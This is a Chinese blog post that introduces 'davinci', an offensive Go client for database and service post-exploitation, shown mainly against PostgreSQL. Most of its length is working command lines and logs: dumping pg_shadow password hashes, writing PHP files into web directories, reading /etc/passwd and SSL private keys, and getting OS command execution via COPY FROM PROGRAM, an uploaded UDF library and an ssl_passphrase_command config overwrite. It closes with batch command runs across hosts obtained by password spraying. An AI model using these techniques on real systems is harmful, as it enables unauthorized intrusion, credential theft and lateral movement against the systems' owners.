多组件客户端
2024-9-9 16:23:13 Author: mp.weixin.qq.com(查看原文) 阅读量:3 收藏

  • • 前言

  • • 以PostgreSQL为例

    • • 交互式命令行

    • • 非交互式命令

    • • 自动化信息收集

    • • 文件写入

      • • lo_export

      • • copy to

    • • 文件读取

      • • lo_import

      • • pg_read_file

      • • copy from

    • • 执行系统命令

      • • CVE-2019-9193(copy from program)

      • • UDF

      • • ssl_passphrase_command

    •  创建目录

    •  列目录

  • • 批量执行

    •  执行模板

    •  批量执行

在内网经常会遇到各类数据库、中间件,但由于网络隔离、容器环境等各种因素影响,要在据点中得到一个可用的组件客户端有时候也并非轻易之举。此外,官方客户端也有可能不适配某些场景,例如所用C2是非交互式的,此时就很需要一个支持单行命令直接执行的工具。

笔者之前一般都是用官方的客户端,有时候遇到容器环境需要自行静态编译,遇到了非交互式的还用过expect脚本,到了真正能用上客户端时,又需要多个重复的动作来完成信息收集和漏洞利用。这对节能主义者来说是难以忍受的,于是就萌生过写一款工具来解决上述遇到的问题。

工具特性

  • 支持多个组件:MySQL、PostgreSQL、Clickhouse、GaussDB、MongoDB、Redis、SSH、Elasticsearch

  • 三大基础功能:

    • 交互式Shell:交互式执行命令,类似一般官方客户端提供的能力

    • 非交互式执行:直接在一行中完成命令执行

    • 信息收集:批量执行一组预置命令,完成各个组件的基础信息收集

  • 针对各个组件定制的特定功能,包括但不限于:系统命令执行、文件读写等,取决于组件本身支持的利用方式

  • 批量执行:通过模板文件来对一组目标批量执行命令

  • 使用go开发,利用go交叉编译的特性,可以轻松编译出适配各种环境的可执行文件

  • 详细的日志记录,便于复盘:)

注:上述的"命令"是指组件自身的命令,例如对于MySQL来说是SQL,而对于SSH来说则是系统命令。

工具地址:https://github.com/Ape1ron/davinci

下面通过PostgreSQL利用来介绍工具的使用。

每个组件都对应了一个子命令,PostgreSQL对应pgsql

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci_linux_amd64 pgsql --help

  3. pgsql client:

  4. - exec: execute the command once and return directly

  5. - shell: pgsql interactive shell

  6. - auto_gather: automatically collect database information, including users, databases,

  7. tables, table structures, and the first 5 rows of data for each table

  8. - osshell: exec os shell,three ways: [cve-2019-9193 | udf | ssl_passpharse]

  9. - writefile: write file,two ways: [lo_export | copy_to]

  10. - readfile: read file,three ways: [lo_import | pg_read | copy_from]

  11. - mkdir: create dir through log_directory,premise is logging_collector = on

  12. - lsdir: list dir through pg_ls_dir

  13. Example:

  14. davinci pgsql exec -H 192.168.1.2 -P 5432 -u postgres -p 123456 -c "select user;"

  15. davinci pgsql shell -H 192.168.1.2 -P 5432 -u postgres -p 123456

  16. davinci pgsql auto_gather -H 192.168.1.2 -P 5432 -u postgres -p 123456

  17. davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --cve-2019-9193

  18. davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --cve-2019-9193 --no-interactive -c "whoami"

  19. davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --udf

  20. davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --udf --no-interactive -c "whoami"

  21. davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --ssl_passpharse -c "whoami"

  22. davinci pgsql writefile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --lo_export -s ./eval.php -t /var/www/html/1.php

  23. davinci pgsql writefile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --copy_to -C "<?php phpinfo(); ?>" -t /var/www/html/1.php

  24. davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --lo_import -t /etc/passwd

  25. davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --pg_read -t /etc/passwd

  26. davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --copy_from -t /etc/passwd --hex

  27. davinci pgsql mkdir -H 192.168.1.2 -P 5432 -u postgres -p 123456 -t /etc/pg_dir

  28. davinci pgsql lsdir -H 192.168.1.2 -P 5432 -u postgres -p 123456 -t /

  29. Usage:

  30. davinci pgsql [exec|shell|auto_gather|osshell|writefile|readfile|mkdir|lsdir] [flags]

  31. Flags:

  32. -c, --cmd string cmd to be executed, used in exec(sql) and osshell(shell) mode

  33. -C, --content string [write] write content to target,use for write file mode,choose one of content and source

  34. --copy_from [read] use copy from to readfile

  35. --copy_to [write] use 'copy to' to readfile

  36. --cve-2019-9193 [osshell] use cve-2019-9193(copy from program) to exec,support version>=9.3

  37. -d, --dbName string database name,not require

  38. -h, --help help for pgsql

  39. --hex [write/read] encode write/read file content

  40. -H, --host string pgsql ip addr (default "127.0.0.1")

  41. --lo_export [write] use lo_export to readfile

  42. --lo_import [read] use lo_import to readfile

  43. --no-interactive no-interactive with os shell

  44. -p, --passwd string pasword

  45. --pg_read [read] use pg_read to readfile

  46. -P, --port int pgsql port (default 5432)

  47. -s, --source string [write] (local) source file path,use for write file mode

  48. --ssl_passpharse [osshell] use pgconfig ssl passpharse to exec,support version>=11

  49. -t, --target string [write/read] (remote) target file path,use for write/read file mode

  50. --udf [osshell] use udf to exec

  51. -u, --user string username (default "postgres")

  52. Global Flags:

  53. --no-log not log to file

  54. --silent close info level output

交互式命令行

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql shell -H 192.168.83.129 -P 5432 -p 123456

  3. > select version()

  4. 2024/09/07 09:35:15 [info] execute sql: select version()

  5. +--------------------------------+

  6. | VERSION |

  7. +--------------------------------+

  8. | PostgreSQL 16.4 (Debian |

  9. | 16.4-1.pgdg120+1) on |

  10. | x86_64-pc-linux-gnu, compiled |

  11. | by gcc (Debian 12.2.0-14) |

  12. | 12.2.0, 64-bit |

  13. +--------------------------------+

  14. > exit

非交互式命令

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql exec -H 192.168.83.129 -P 5432 -p 123456 -c "select version()"

  3. 2024/09/07 09:36:27 [info] execute sql: select version()

  4. +--------------------------------+

  5. | VERSION |

  6. +--------------------------------+

  7. | PostgreSQL 16.4 (Debian |

  8. | 16.4-1.pgdg120+1) on |

  9. | x86_64-pc-linux-gnu, compiled |

  10. | by gcc (Debian 12.2.0-14) |

  11. | 12.2.0, 64-bit |

  12. +--------------------------------+

自动化信息收集

收集逻辑如下:

  • 获取版本信息

  • 获取数据库用户列表

  • 获取数据库支持的编程语言列表(pg_language)

  • 获取database列表

  • 遍历database获取所有schema(自动排除自带的database)

  • 遍历所有schema获取所有table(自动排除自带的schemas)

  • 获取每个table的结构,数据量以及前5行数据

  • 获取所有扩展列表(pgavailableextensions)

  • 获取数据库配置(pg_settings)

使用方式

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql auto_gather -H 192.168.83.129 -P 5432 -p 123456

  3. 2024/09/07 09:45:54 [info] get version

  4. 2024/09/07 09:45:54 [info] execute sql: select version();

  5. +--------------------------------+

  6. | VERSION |

  7. +--------------------------------+

  8. | PostgreSQL 16.4 (Debian |

  9. | 16.4-1.pgdg120+1) on |

  10. | x86_64-pc-linux-gnu, compiled |

  11. | by gcc (Debian 12.2.0-14) |

  12. | 12.2.0, 64-bit |

  13. +--------------------------------+

  14. 2024/09/07 09:45:54 [info] get users

  15. 2024/09/07 09:45:54 [info] execute sql: SELECT usename,passwd FROM pg_shadow;

  16. +----------+---------------------------------------------------------------------------------------------------------------------------------------+

  17. | USENAME | PASSWD |

  18. +----------+---------------------------------------------------------------------------------------------------------------------------------------+

  19. | postgres | SCRAM-SHA-256$4096:IgY4gbZGYJm+Izbd5oY/Sg==$mImJT90qIRjmncKZUF6AdNcPHrReGcQlx/jSviY4r0w=:tPjBnjvHwBErOD8XsO/XANg4t6np9BgmxC/DrG7k0kc= |

  20. +----------+---------------------------------------------------------------------------------------------------------------------------------------+

  21. 2024/09/07 09:45:54 [info] get pg_language

  22. 2024/09/07 09:45:54 [info] execute sql: select * from pg_language

  23. +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+

  24. | OID | LANNAME | LANOWNER | LANISPL | LANPLTRUSTED | LANPLCALLFOID | LANINLINE | LANVALIDATOR | LANACL |

  25. +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+

  26. | 12 | internal | 10 | false | false | 0 | 0 | 2246 | |

  27. | 13 | c | 10 | false | false | 0 | 0 | 2247 | |

  28. | 14 | sql | 10 | false | true | 0 | 0 | 2248 | |

  29. | 13568 | plpgsql | 10 | true | true | 13565 | 13566 | 13567 | |

  30. +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+

  31. 2024/09/07 09:45:54 [info] get databases

  32. 2024/09/07 09:45:54 [info] execute sql: SELECT datname FROM pg_catalog.pg_database;

  33. +-----------+

  34. | DATNAME |

  35. +-----------+

  36. | postgres |

  37. | template1 |

  38. | template0 |

  39. +-----------+

  40. 2024/09/07 09:45:54 [info] exclude database(built-in): template1,template0

  41. 2024/09/07 09:45:54 [info] get current database

  42. 2024/09/07 09:45:54 [info] execute sql: select current_database();

  43. +------------------+

  44. | CURRENT DATABASE |

  45. +------------------+

  46. | postgres |

  47. +------------------+

  48. 2024/09/07 09:45:54 [info] get database size: postgres

  49. 2024/09/07 09:45:54 [info] execute sql: SELECT pg_size_pretty( pg_database_size('postgres') );

  50. +----------------+

  51. | PG SIZE PRETTY |

  52. +----------------+

  53. | 7484 kB |

  54. +----------------+

  55. 2024/09/07 09:45:54 [info] get schemas

  56. 2024/09/07 09:45:54 [info] execute sql: SELECT schema_name,catalog_name,sql_path FROM information_schema.schemata;

  57. +--------------------+--------------+----------+

  58. | SCHEMA NAME | CATALOG NAME | SQL PATH |

  59. +--------------------+--------------+----------+

  60. | public | postgres | |

  61. | information_schema | postgres | |

  62. | pg_catalog | postgres | |

  63. | pg_toast | postgres | |

  64. +--------------------+--------------+----------+

  65. 2024/09/07 09:45:54 [info] exclude schemas(built-in): pg_toast,pg_temp_1,pg_toast_temp_1,pg_catalog,information_schema

  66. 2024/09/07 09:45:54 [info] [info] get tables in public

  67. 2024/09/07 09:45:54 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='public'

  68. +------------+

  69. | TABLE NAME |

  70. +------------+

  71. +------------+

  72. 2024/09/07 09:45:54 [info] get extensions

  73. 2024/09/07 09:45:54 [info] execute sql: select * from pg_available_extensions

  74. +--------------------+-----------------+-------------------+--------------------------------+

  75. | NAME | DEFAULT VERSION | INSTALLED VERSION | COMMENT |

  76. +--------------------+-----------------+-------------------+--------------------------------+

  77. | autoinc | 1.0 | | functions for autoincrementing |

  78. | ... | | | ... |

  79. +--------------------+-----------------+-------------------+--------------------------------+

  80. 2024/09/07 09:45:56 [info] get pg settings

  81. 2024/09/07 09:45:56 [info] execute sql: select name,setting from pg_settings

  82. +---------------------------------------------+------------------------------------------+

  83. | NAME | SETTING |

  84. +---------------------------------------------+------------------------------------------+

  85. | allow_in_place_tablespaces | off |

  86. | ... | ... |

  87. +---------------------------------------------+------------------------------------------+

文件写入

支持两种写文件的方式:

  • lo_export

  • copy to

两种写文件均支持两个参数来指定写入内容:

  • -C:直接在命令行指定写入内容

  • -s:指定源文件路径,程序会读取本地文件来作为写入内容

推荐优先选择lo_export来写文件

lo_export写文件

  • 支持相对路径,默认路径是/var/lib/postgresql/data/

  • 支持二进制写入

  • 支持覆盖已有文件

  • 支持多行文件

使用方式

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql writefile --lo_export -H 192.168.83.129 -P 5432 -p 123456 -s 1.php -t /tmp/1.php

  3. 2024/09/07 10:56:13 [info] execute sql: select count(*) from pg_largeobject where loid=172132

  4. 2024/09/07 10:56:13 [info] lo_export write file

  5. 2024/09/07 10:56:13 [info] execute sql: select lo_from_bytea(172132,decode('3c3f70687020706870696e666f28293b203f3e0a','hex'));

  6. 2024/09/07 10:56:13 [info] execute sql: select lo_export(172132, '/tmp/1.php');

  7. 2024/09/07 10:56:13 [info] write success

  8. 2024/09/07 10:56:13 [info] execute sql: select lo_unlink(172132)

也可以选择 -C来直接指定写入内容

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql writefile --lo_export -H 192.168.83.129 -P 5432 -p 123456 -C '<?php phpinfo(); ?>' -t /tmp/2.php

  3. 2024/09/07 10:59:00 [info] execute sql: select count(*) from pg_largeobject where loid=139935

  4. 2024/09/07 10:59:00 [info] lo_export write file

  5. 2024/09/07 10:59:00 [info] execute sql: select lo_from_bytea(139935,decode('3c3f70687020706870696e666f28293b203f3e','hex'));

  6. 2024/09/07 10:59:00 [info] execute sql: select lo_export(139935, '/tmp/2.php');

  7. 2024/09/07 10:59:00 [info] write success

  8. 2024/09/07 10:59:00 [info] execute sql: select lo_unlink(139935)

copy to写文件

copy to只能写单行文件,因为所有换行符都会被转义,推荐优先使用lo_export。

使用方式

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql writefile --copy_to -H 192.168.83.129 -P 5432 -p 123456 -C '<?php phpinfo(); ?>' -t /tmp/3.php

  3. 2024/09/07 11:01:04 [info] copy to write file

  4. 2024/09/07 11:01:04 [info] execute sql: copy (select convert_from(decode('3c3f70687020706870696e666f28293b203f3e','hex'),'utf-8')) to '/tmp/3.php';

  5. 2024/09/07 11:01:04 [info] write success

文件读取

支持三种方式读取文件

  • lo_import

  • pgreadfile

  • copy from

三种读取文件的方式均支持 --hex参数,当输入该参数后,读取的文件内容自动使用hex编码,常用于读取二进制文件的场景

lo_import读取文件

  • 只要有权限读即可,不限制目录

  • 可以读取二进制文件

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql readfile --lo_import -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php

  3. 2024/09/07 11:19:04 [info] read file by lo_import()

  4. 2024/09/07 11:19:04 [info] execute sql: select count(*) from pg_largeobject where loid=083516

  5. 2024/09/07 11:19:04 [info] execute sql: select lo_import('/tmp/1.php',083516);

  6. 2024/09/07 11:19:04 [info] execute sql: select data from pg_largeobject where loid=083516

  7. 2024/09/07 11:19:04 [info] execute sql: select lo_unlink(083516)

  8. <?php phpinfo(); ?>

可以增加 --hex参数编码读取结果

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql readfile --lo_import -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php --hex

  3. 2024/09/07 11:19:39 [info] read file by lo_import()

  4. 2024/09/07 11:19:39 [info] execute sql: select count(*) from pg_largeobject where loid=164009

  5. 2024/09/07 11:19:39 [info] execute sql: select lo_import('/tmp/1.php',164009);

  6. 2024/09/07 11:19:39 [info] execute sql: select encode(data,'hex') from pg_largeobject where loid=164009

  7. 2024/09/07 11:19:39 [info] execute sql: select lo_unlink(164009)

  8. 3c3f70687020706870696e666f28293b203f3e0a

pgreadfile读取文件

  • 在部分版本下,只能访问datadirectory和logdirectory配置指向目录下的文件。

  1. select current_setting('data_directory')

  2. select current_setting('log_directory')

使用方式

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql readfile --pg_read -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php

  3. 2024/09/07 11:24:13 [info] read file by pg_read_file

  4. 2024/09/07 11:24:13 [info] execute sql: select pg_read_file('/tmp/1.php')

  5. <?php phpinfo(); ?>

copy from 读取文件

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql readfile --copy_from -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php

  3. 2024/09/07 11:25:19 [info] read file by copy from

  4. 2024/09/07 11:25:19 [info] [info] get tables in postgres

  5. 2024/09/07 11:25:19 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='postgres'

  6. 2024/09/07 11:25:19 [info] execute sql: create table IqOhlvlLoU(data TEXT);

  7. 2024/09/07 11:25:19 [info] execute sql: copy IqOhlvlLoU from '/tmp/1.php';

  8. 2024/09/07 11:25:19 [info] execute sql: select data from IqOhlvlLoU

  9. 2024/09/07 11:25:19 [info] execute sql: drop table IqOhlvlLoU;

  10. <?php phpinfo(); ?>

执行系统命令

支持三种方式执行系统命令:

  • CVE-2019-9193 / copy from program

  • UDF

  • sslpassphrasecommand

推荐优先使用CVE-2019-9193(copy from program)方式来执行系统命令

CVE-2019-9193(copy from program) 执行系统命令

虽然被分配了CVE编号(tag为disputed),但PostgreSQL官方并不认为该利用方式为安全漏洞,而是正常的功能需求,详情可参考:https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/

因此该利用方式从9.3版本开始(提供copy from语句),一直到目前最新发行版本16都是有效的。

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql osshell --cve-2019-9193 -H 192.168.83.129 -P 5432 -p 123456

  3. > pwd

  4. 2024/09/07 14:02:36 [info] [info] get tables in postgres

  5. 2024/09/07 14:02:36 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='postgres'

  6. 2024/09/07 14:02:36 [info] execute sql: CREATE TABLE LCQUfcYtqd(output text);

  7. 2024/09/07 14:02:36 [info] execute sql: COPY LCQUfcYtqd FROM PROGRAM 'pwd';

  8. 2024/09/07 14:02:36 [info] execute sql: select output from LCQUfcYtqd

  9. 2024/09/07 14:02:36 [info] execute sql: DROP TABLE IF EXISTS LCQUfcYtqd;

  10. /var/lib/postgresql/data

类似地,你也可以 --no-interactive参数非交互式执行单条命令

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql osshell --cve-2019-9193 -H 192.168.83.129 -P 5432 -p 123456 --no-interactive -c "pwd" --silent

  3. /var/lib/postgresql/data

UDF 执行系统命令

在第一次加载UDF时,需要先上传动态链接库并创建UDF,退出后不会主动删除UDF。

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql osshell --udf -H 192.168.83.129 -P 5432 -p 123456

  3. > pwd

  4. 2024/09/07 14:13:14 [info] execute sql: select * from pg_proc where proname='sys_eval'

  5. 2024/09/07 14:13:14 [info] execute sql: show server_version

  6. 2024/09/07 14:13:14 [info] execute sql: select version()

  7. 2024/09/07 14:13:14 [info] os: linux , platform: x86_64, version: 16.4 (Debian 16.4-1.pgdg120+1)

  8. 2024/09/07 14:13:14 [info] main version: 16

  9. 2024/09/07 14:13:14 [info] execute sql: select current_setting('data_directory')

  10. 2024/09/07 14:13:14 [info] execute sql: select count(*) from pg_largeobject where loid=079233

  11. 2024/09/07 14:13:14 [info] lo_export write file

  12. 2024/09/07 14:13:14 [info] execute sql: select lo_from_bytea(079233,decode('74....','hex'));

  13. 2024/09/07 14:13:14 [info] execute sql: select lo_export(079233, '/var/lib/postgresql/data/BodhUbRg.so');

  14. 2024/09/07 14:13:14 [info] write success

  15. 2024/09/07 14:13:14 [info] execute sql: select lo_unlink(079233)

  16. 2024/09/07 14:13:14 [info] execute sql: create or replace function sys_eval(text) returns text as '/var/lib/postgresql/data/BodhUbRg.so','sys_eval' language c strict;

  17. 2024/09/07 14:13:14 [info] execute sql: select sys_eval('pwd')

  18. /var/lib/postgresql/data

  19. > whoami

  20. 2024/09/07 14:13:24 [info] execute sql: select * from pg_proc where proname='sys_eval'

  21. 2024/09/07 14:13:24 [info] execute sql: select sys_eval('whoami')

  22. postgres

你可以通过如下方式删除UDF:

  1. ./davinci pgsql exec -H 192.168.83.129 -u postgres -p myPass@123 -c "drop function sys_eval"

在PostgreSQL 8.2 及之后,会对链接库进行校验(10之前每个小版本校验,10之后每个大版本校验),因此每个版本都需要独立编译链接库,工具已内置了Linux下的多个版本的UDF链接库,并且会自动收集信息来选择对应的链接库。

  • X86_64:8.2-8.4,9.0-9.6,10-16

  • X86_32:8.2-8.4,9.0-9.6,10-15

  • ARM64:9.1-9.6,10-16

如果你的目标并不在预置列表中,可以参考如下扩展编译方式:

  1. 找到目标版本,下载对应的postgresql-server-dev

  2. 将/davinci/lib/postgresql/eval.c上传到编译机器

  3. 运行编译命令,其中/usr/include/postgresql/10/server目录是postgres.h头文件的所在目录

  1. gcc -Wall -I/usr/include/postgresql/10/server -Os -shared eval.c -fPIC -o lib_postgresqludf_sys_eval_exec.so

操作可参考:https://infosecwriteups.com/compiling-postgres-library-for-exploiting-udf-to-rce-d8cfd197bdf9

sslpassphrasecommand 执行系统命令

参考:https://pulsesecurity.co.nz/articles/postgres-sqli

原理:当postgresql.conf配置了 sslpassphrasecommand 时,在获取SSL文件的密码时会调用该配置指定的命令。上传 pem,key 到目标服务器上,读取并覆盖配置文件,重载配置文件时将执行命令。

利用条件:

  • 需要知道 PGVERSION 文件的位置 (不是 PGVERSION 文件也行,pgsql限制私钥文件权限必须是0600才能够加载,理论上pgsql目录下所有0600权限的文件都是可以的,但覆盖后影响较小的就 PG_VERSION 了),默认就在conf目录,比较容易读到

  • pg version >= 11,11开始才支持sslpassphrasecommand命令

注意,该方式执行命令无回显。

利用方式:

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql osshell --ssl_passpharse -H 192.168.83.129 -P 5432 -p 123456 -c "touch /tmp/ssl_passpharse_test.txt"

  3. 2024/09/07 16:06:47 [info] execute sql: show server_version

  4. 2024/09/07 16:06:47 [info] read file by lo_import()

  5. 2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=724369

  6. 2024/09/07 16:06:47 [info] execute sql: select lo_import('/etc/ssl/private/ssl-cert-snakeoil.key',724369);

  7. 2024/09/07 16:06:47 [info] execute sql: select data from pg_largeobject where loid=724369

  8. 2024/09/07 16:06:47 [info] execute sql: select lo_unlink(724369)

  9. 2024/09/07 16:06:47 [info] execute sql: select current_setting('data_directory')

  10. 2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=591751

  11. 2024/09/07 16:06:47 [info] lo_export write file

  12. 2024/09/07 16:06:47 [info] execute sql: select lo_from_bytea(591751,decode('...','hex'));

  13. 2024/09/07 16:06:47 [info] execute sql: select lo_export(591751, '/var/lib/postgresql/data/PG_VERSION');

  14. 2024/09/07 16:06:47 [info] write success

  15. 2024/09/07 16:06:47 [info] execute sql: select lo_unlink(591751)

  16. 2024/09/07 16:06:47 [info] execute sql: select setting from pg_settings where name='config_file'

  17. 2024/09/07 16:06:47 [info] config_file: /var/lib/postgresql/data/postgresql.conf

  18. 2024/09/07 16:06:47 [info] read file by pg_read_file

  19. 2024/09/07 16:06:47 [info] execute sql: select pg_read_file('/var/lib/postgresql/data/postgresql.conf')

  20. 2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=080308

  21. 2024/09/07 16:06:47 [info] lo_export write file

  22. 2024/09/07 16:06:47 [info] execute sql: select lo_from_bytea(080308,decode('...','hex'));

  23. 2024/09/07 16:06:47 [info] execute sql: select lo_export(080308, '/var/lib/postgresql/data/postgresql.conf');

  24. 2024/09/07 16:06:47 [info] write success

  25. 2024/09/07 16:06:47 [info] execute sql: select lo_unlink(080308)

  26. 2024/09/07 16:06:47 [info] execute sql: select pg_reload_conf();

  27. 2024/09/07 16:06:47 [info] exec success

创建目录

参考:https://www.yulegeyu.com/2020/11/16/Postgresql-Superuser-SQL%E6%B3%A8%E5%85%A5-RCE%E4%B9%8B%E6%97%85/

利用条件

  • 目标已经配置了 logging_collector = on (默认关闭)

原理:当PostgreSQL开启了日志服务后,修改postgresql.conf中的log_directory指定日志存储目录,当目录不存在时会被创建

利用方式

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql mkdir -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/test

  3. 2024/09/07 16:46:13 [info] execute sql: select setting from pg_settings where name='logging_collector'

  4. 2024/09/07 16:46:13 [info] execute sql: select setting from pg_settings where name='config_file'

  5. 2024/09/07 16:46:13 [info] config_file: /var/lib/postgresql/data/postgresql.conf

  6. 2024/09/07 16:46:13 [info] read file by pg_read_file

  7. 2024/09/07 16:46:13 [info] execute sql: select pg_read_file('/var/lib/postgresql/data/postgresql.conf')

  8. 2024/09/07 16:46:13 [info] execute sql: select count(*) from pg_largeobject where loid=945798

  9. 2024/09/07 16:46:13 [info] lo_export write file

  10. 2024/09/07 16:46:13 [info] execute sql: select lo_from_bytea(945798,decode('...','hex'));

  11. 2024/09/07 16:46:14 [info] execute sql: select lo_export(945798, '/var/lib/postgresql/data/postgresql.conf');

  12. 2024/09/07 16:46:14 [info] write success

  13. 2024/09/07 16:46:14 [info] execute sql: select lo_unlink(945798)

  14. 2024/09/07 16:46:14 [info] execute sql: select pg_reload_conf();

  15. 2024/09/07 16:46:14 [info] execute sql: select setting from pg_settings where name='log_directory'

  16. 2024/09/07 16:46:14 [info] execute sql: select count(*) from pg_largeobject where loid=660165

  17. 2024/09/07 16:46:14 [info] execute sql: select lo_import('/tmp/test',660165);

  18. 2024/09/07 16:46:14 [info] mkdir dir success

注意,该利用方式会修改数据库的日志存储目录。

列目录

利用pglsdir函数列目录

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci pgsql lsdir -H 192.168.83.129 -P 5432 -p 123456 -t /

  3. 2024/09/07 16:31:44 [info] list dir by pg_ls_dir

  4. 2024/09/07 16:31:44 [info] execute sql: select pg_ls_dir('/')

  5. +----------------------------+

  6. | PG LS DIR |

  7. +----------------------------+

  8. | home |

  9. | media |

  10. | sys |

  11. | sbin |

  12. | var |

  13. | mnt |

  14. | etc |

  15. | dev |

  16. | lib |

  17. | bin |

  18. | usr |

  19. | run |

  20. | boot |

  21. | tmp |

  22. | proc |

  23. | opt |

  24. | lib64 |

  25. | srv |

  26. | root |

  27. | .dockerenv |

  28. | docker-entrypoint-initdb.d |

  29. +----------------------------+

在内网中,通过密码喷洒等方式获取不同组件的多个实例权限是常见的场景,该功能可以实现在多个目标上同时执行一组命令。

执行模板

批量执行功能需要使用配置文件来制定执行计划,可以通过如下面命令导出一份模板:

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci batch export

  3. 2024/09/07 15:01:41 [info] export batch config template success: .davinci_batch.json

  4. ┌──(rootkali)-[~/tools]

  5. └─# cat .davinci_batch.json

  6. [

  7. {

  8. "cmd_type": "ssh",

  9. "hosts": [

  10. "127.0.0.1",

  11. "192.168.83.1/24",

  12. "192.168.83.1-20"

  13. ],

  14. "port": 22,

  15. "user": "root",

  16. "passwd": "123456",

  17. "cmds": [

  18. "ls -al /",

  19. "ifconfig"

  20. ]

  21. },

  22. {

  23. "cmd_type": "redis",

  24. "hosts": [

  25. "127.0.0.1"

  26. ],

  27. "port": 6379,

  28. "cmds": [

  29. "dbsize"

  30. ]

  31. }

  32. ]

配置文件是一个数组,每个元素对应一批执行目标,如下所示,如果类型、端口、用户名、和密码相同就可以归结为同一批目标。

  1. type batchExec struct {

  2. CmdType string `json:"cmd_type"` // 类型:ssh、mysql、pgsql、gaussdb、clickhouse、redis、mongo

  3. Hosts []string `json:"hosts"` // 域名或ip,ip支持三种表达形式,如导出文件所示

  4. Port int `json:"port,omitempty"` // 端口

  5. User string `json:"user,omitempty"` // 用户名

  6. Passwd string `json:"passwd,omitempty"` // 密码

  7. Cmds []string `json:"cmds"` // 需要执行的命令,每条命令可以看作对应./davinci {service} exec xxx

  8. }

批量执行

如下模板分别对192.168.83.129的SSH,192.168.83.129的PostgreSQL执行命令:

  1. [

  2. {

  3. "cmd_type": "ssh",

  4. "hosts": [

  5. "192.168.83.129"

  6. ],

  7. "port": 22,

  8. "user": "root",

  9. "passwd": "123456",

  10. "cmds": [

  11. "ls -al /",

  12. "ifconfig"

  13. ]

  14. },

  15. {

  16. "cmd_type": "pgsql",

  17. "hosts": [

  18. "192.168.83.129"

  19. ],

  20. "port": 5432,

  21. "user": "postgres",

  22. "passwd": "123456",

  23. "cmds": [

  24. "select version()",

  25. "select oid, datname from pg_catalog.pg_database"

  26. ]

  27. }

  28. ]

编辑好模板后,使用如下命令批量执行。

  1. ┌──(rootkali)-[~/tools]

  2. └─# ./davinci batch exec -f davinci_batch.json

  3. 2024/09/07 15:18:12 [info] load batch config success: davinci_batch.json

  4. 2024/09/07 15:18:12 [info] try batch execute in : 192.168.83.129

  5. 2024/09/07 15:18:13 [info] execute: ls -al /

  6. total 2097272

  7. drwxr-xr-x 26 root root 4096 Sep 5 19:29 .

  8. drwxr-xr-x 26 root root 4096 Sep 5 19:29 ..

  9. drwxr-xr-x 2 root root 4096 May 13 07:45 bin

  10. drwxr-xr-x 3 root root 4096 May 13 07:40 boot

  11. drwxrwxr-x 2 root root 4096 May 12 23:25 cdrom

  12. drwxr-xr-x 3 root root 4096 Sep 5 19:29 data

  13. drwxr-xr-x 17 root root 4380 Aug 29 20:55 dev

  14. drwxr-xr-x 128 root root 12288 Aug 27 23:48 etc

  15. drwxr-xr-x 4 root root 4096 Aug 27 23:52 home

  16. 2024/09/07 15:18:13 [info] execute: ifconfig

  17. docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

  18. inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255

  19. inet6 fe80::42:3ff:fec6:8068 prefixlen 64 scopeid 0x20<link>

  20. ether 02:42:03:c6:80:68 txqueuelen 0 (Ethernet)

  21. RX packets 13021 bytes 1372419 (1.3 MB)

  22. RX errors 0 dropped 0 overruns 0 frame 0

  23. TX packets 14188 bytes 66081327 (66.0 MB)

  24. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

  25. ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

  26. inet 192.168.83.129 netmask 255.255.255.0 broadcast 192.168.83.255

  27. inet6 fe80::20c:29ff:fe7b:6220 prefixlen 64 scopeid 0x20<link>

  28. ether 00:0c:29:7b:62:20 txqueuelen 1000 (Ethernet)

  29. RX packets 2027131 bytes 2375833742 (2.3 GB)

  30. RX errors 0 dropped 0 overruns 0 frame 0

